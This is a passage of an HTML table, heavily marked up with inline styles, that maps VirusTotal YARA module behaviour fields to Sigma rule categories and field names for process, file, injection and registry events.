style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">YARA
VT module field</span></p>
</td>
<td
style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Sigma
Category</span></p>
</td>
<td
style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Sigma
Field</span></p>
</td>
</tr>
<tr style="height: 60pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_created_processes</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_created</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentCommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">OriginalFileName</span>
</p>
</td>
</tr>
<tr style="height: 127.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_files</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_attribute_changed
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_deleted</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_opened</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_copied
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_copied[x].destination</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_copied[x].source</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_written</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped[x].path</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped[x].sha256</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.files_dropped[x].type</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_access</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_change</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_delete</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_rename</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">file_event</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetFilename</span>
</p>
</td>
</tr>
<tr style="height: 93.75pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_injected_processes</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_injected</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_access</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">create_remote_thread</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CallTrace</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">GrantedAccess</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartModule</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartFunction</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
</td>
</tr>
<tr style="height: 150pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_processes</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_terminated
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_killed
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_created</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.command_executions</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.processes_injected
</span></p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_access</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">create_remote_thread</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CallTrace</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">GrantedAccess</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartModule</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">StartFunction</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentCommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">OriginalFileName</span>
</p>
</td>
</tr>
<tr style="height: 60pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_registry</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_deleted</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_opened
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_set</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_set[x].key</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.registry_keys_set[x].value</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_add</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_delete</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_event</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_rename</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_set</span>
</p>
</td>
<td
